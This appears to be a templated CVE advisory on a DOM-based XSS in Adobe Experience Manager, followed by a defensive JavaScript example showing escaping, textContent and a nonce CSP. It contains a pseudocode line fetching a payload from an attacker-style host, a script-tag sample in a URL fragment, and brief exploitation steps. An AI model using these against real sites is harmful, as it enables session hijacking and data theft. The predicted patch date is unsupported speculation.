How the CVE Works
CVE-2025-47049 is a DOM-based Cross-Site Scripting (XSS) vulnerability in Adobe Experience Manager (AEM) versions 6.5.22 and earlier. The flaw occurs when untrusted input is written to the DOM without proper sanitization, allowing attackers to inject malicious JavaScript. When a victim visits a specially crafted webpage, the attacker can manipulate DOM elements to execute arbitrary scripts in the victim’s browser session. This can lead to session hijacking, data theft, or unauthorized actions within the AEM interface. Exploitation requires user interaction, such as clicking a malicious link.
DailyCVE Form
Platform: Adobe Experience Manager
Version: ≤ 6.5.22
Vulnerability: DOM-based XSS
Severity: Critical
Date: 06/16/2025
Prediction: Patch by 07/15/2025
What Undercode Says
Analytics
document.querySelector('[vulnerable-element]').innerHTML = unescapedInput; // vulnerable sink: untrusted input is parsed as HTML, so any markup in it becomes live DOM
curl -X GET "malicious.site/payload.js" | inject_script  # pseudocode, not a real command: illustrates an attacker-hosted script reaching the page through the sink above
How Exploit
1. Craft malicious URL with XSS payload.
2. Trick user into clicking the link.
3. Execute JavaScript in AEM context.
Protection from this CVE
1. Update to AEM 6.5.23+.
2. Sanitize DOM inputs.
3. Implement CSP headers.
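The following is an added example (not code from the DailyCVE post or from Adobe) that puts the vulnerable sink from the Analytics section next to the two defensive steps listed above: sanitizing what reaches the DOM and emitting a Content-Security-Policy header. It runs offline in Node, so a minimal FakeElement stands in for a DOM node; in a browser the same functions would take the result of document.querySelector(...). The sample URL, the nonce value and the FakeElement class are constructed for the example.

```javascript
// Stand-in for a DOM element so the sink patterns can be exercised without a browser.
// (Constructed for this example; a real browser element parses innerHTML into nodes.)
class FakeElement {
  constructor() {
    this.innerHTML = "";
    this.textContent = "";
  }
}

// DOM-based XSS reads its input on the client side, e.g. from the URL fragment.
// Constructed helper: extract and decode the fragment the page would reflect.
function untrustedFromUrl(url) {
  return decodeURIComponent(new URL(url).hash.slice(1));
}

// Vulnerable pattern from the post: untrusted input written straight to innerHTML.
function renderUnsafe(el, untrusted) {
  el.innerHTML = untrusted; // markup in the input becomes live DOM
  return el.innerHTML;
}

// Mitigation A: treat the input as text. textContent never parses markup.
function renderAsText(el, untrusted) {
  el.textContent = untrusted;
  return el.textContent;
}

// Mitigation B: if an HTML sink must be used, escape the characters that
// change the meaning of markup before writing.
const HTML_ESCAPES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;" };
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => HTML_ESCAPES[c]);
}
function renderEscaped(el, untrusted) {
  el.innerHTML = escapeHtml(untrusted);
  return el.innerHTML;
}

// Mitigation C: a Content-Security-Policy that only allows scripts carrying a
// per-response nonce, so injected inline script or a remote payload.js does not run.
// `nonce` is assumed to be freshly generated for every response.
function buildCsp(nonce) {
  return [
    `script-src 'nonce-${nonce}' 'strict-dynamic'`,
    "object-src 'none'",
    "base-uri 'none'",
  ].join("; ");
}

// Constructed sample: a link whose fragment carries markup, as a crafted URL would.
const SAMPLE_URL =
  "https://aem.example/content/page.html#" +
  encodeURIComponent('<script>console.log("injected")</script>');

function demo() {
  const untrusted = untrustedFromUrl(SAMPLE_URL);
  return {
    untrusted,
    unsafe: renderUnsafe(new FakeElement(), untrusted),
    text: renderAsText(new FakeElement(), untrusted),
    escaped: renderEscaped(new FakeElement(), untrusted),
    csp: buildCsp("r4nd0mN0nce"),
  };
}

console.log(demo());
```

The unsafe path hands the raw fragment to innerHTML; the textContent path keeps the same string but as inert text; the escaped path leaves no `<` in the HTML sink at all. The CSP is defence in depth: even if a sanitization gap remains, a script without the current nonce is blocked by the browser.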
Impact
- Session hijacking
- Data exfiltration
- Unauthorized admin actions
Sources:
Reported By: nvd.nist.gov